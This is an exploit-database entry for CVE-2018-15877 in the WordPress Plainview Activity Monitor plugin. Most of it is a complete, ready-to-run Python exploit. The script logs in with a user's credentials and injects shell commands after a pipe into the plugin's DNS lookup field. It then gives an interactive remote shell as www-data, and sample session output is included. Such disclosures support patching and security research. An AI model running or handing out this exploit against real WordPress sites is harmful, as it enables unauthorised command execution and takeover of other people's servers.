WordPress Plainview Activity Monitor 20161228 Remote Code Execution

2021.07.07
Credit: Beren Kuday Gorun
Risk: High
Local: No
Remote: Yes
CVE: CVE-2018-15877
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) # Date: 07.07.2021 # Exploit Author: Beren Kuday GORUN # Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/ # Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip # Version: 20161228 and possibly prior # Fixed version: 20180826 # CVE : CVE-2018-15877 """ ------------------------- Usage: ┌──(root@kali)-[~/tools] └─# python3 WordPress-Activity-Monitor-RCE.py What's your target IP? 192.168.101.28 What's your username? mark What's your password? password123 [*] Please wait... [*] Perfect! www-data@192.168.101.28 whoami www-data www-data@192.168.101.28 pwd /var/www/html/wp-admin www-data@192.168.101.28 id uid=33(www-data) gid=33(www-data) groups=33(www-data) """ import requests from bs4 import BeautifulSoup def exploit(whoami, ip): while 1: cmd = input(whoami+"@"+ip+" ") url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' payload = "google.com.tr | " + cmd data = {'ip': payload , 'lookup' : 'lookup' } x = requests.post(url, data = data, cookies=getCookie(ip)) html_doc = x.text.split("<p>Output from dig: </p>")[1] soup = BeautifulSoup(html_doc, 'html.parser') print(soup.p.text) def poc(ip): url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' } x = requests.post(url, data = myobj, cookies=getCookie(ip)) html_doc = x.text.split("<p>Output from dig: </p>")[1] soup = BeautifulSoup(html_doc, 'html.parser') print("[*] Perfect! ") exploit(soup.p.text, ip) def getCookie(ip): url = 'http://' + ip + '/wp-login.php' #log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1 data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'} x = requests.post(url, data = data) cookies = {} cookie = str(x.headers["Set-Cookie"]) for i in cookie.split(): if(i.find("wordpress") != -1 and i.find("=") != -1): cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1] return cookies ip = input("What's your target IP?\n") username = input("What's your username?\n") password = input("What's your password?\n") print("[*] Please wait...") poc(ip)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top